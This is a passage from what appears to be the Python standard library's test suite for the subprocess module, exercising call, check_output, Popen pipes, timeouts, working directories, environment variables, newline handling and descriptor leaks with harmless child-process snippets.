self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
        # NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
'__PYVENV_LAUNCHER__' in n or # MacOS framework build
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass"], env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
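        # Exercise every non-empty combination of stdin/stdout/stderr pipes
        # and verify that communicate() closes each pipe it created.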
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines_and_text(self):
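        # 'text' is an alias for 'universal_newlines': with either flag the
        # streams are opened in text mode and \r\n / \r line endings are
        # translated to \n on read.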
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
        # A Python debug build writes something like "[42442 refs]\n"
        # to stderr when the subprocess exits.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
        # UTF-16 and UTF-32-BE are enough to cover an encoding that writes a
        # BOM and one that does not, as well as both the UTF-16 and UTF-32
        # families.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
